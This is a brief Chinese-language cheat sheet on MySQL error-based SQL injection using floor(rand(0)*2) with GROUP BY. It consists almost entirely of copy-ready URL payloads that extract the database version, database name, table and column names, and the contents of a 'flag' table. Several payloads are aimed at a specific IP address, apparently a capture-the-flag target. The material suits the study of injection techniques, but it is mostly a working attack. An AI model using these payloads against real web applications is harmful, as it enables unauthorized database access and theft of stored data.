floor报错注入总结
floor报错注入总结:
这里其实是二次查询注入
这里在利用相关函数时,使用了两次select查询
公式:
?id=1 and 1=2 union select 1 from (select+count(*),concat(floor(rand(0)*2),(测试语句))a from information_schema.tables group by a)b
查看当前数据库版本:
?id=1 and 1=2 union select 1 from (select+count(*),concat(floor(rand(0)*2),version())a from information_schema.tables group by a)b
查看数据库名:
?id=1 and 1=2 union select 1 from (select+count(*),concat(floor(rand(0)*2),database())a from information_schema.tables group by a)b
查询表名:
http://222.18.158.243:4606/?id=1 and 1=2 union select 1 from (select+count(*),concat(floor(rand(0)*2),(select table_name from information_schema.tables where table_schema=database() limit 1,1))a from information_schema.tables group by a)b
查询字段名:
http://222.18.158.243:4606/?id=1 and 1=2 union select 1 from (select+count(*),concat(floor(rand(0)*2),(select column_name from information_schema.columns where table_name='flag' limit 0,1))a from information_schema.tables group by a)b
查询字段内容:
http://222.18.158.243:4606/?id=1 and 1=2 union select 1 from (select+count(*),concat(floor(rand(0)*2),(select flag from flag))a from information_schema.tables group by a)b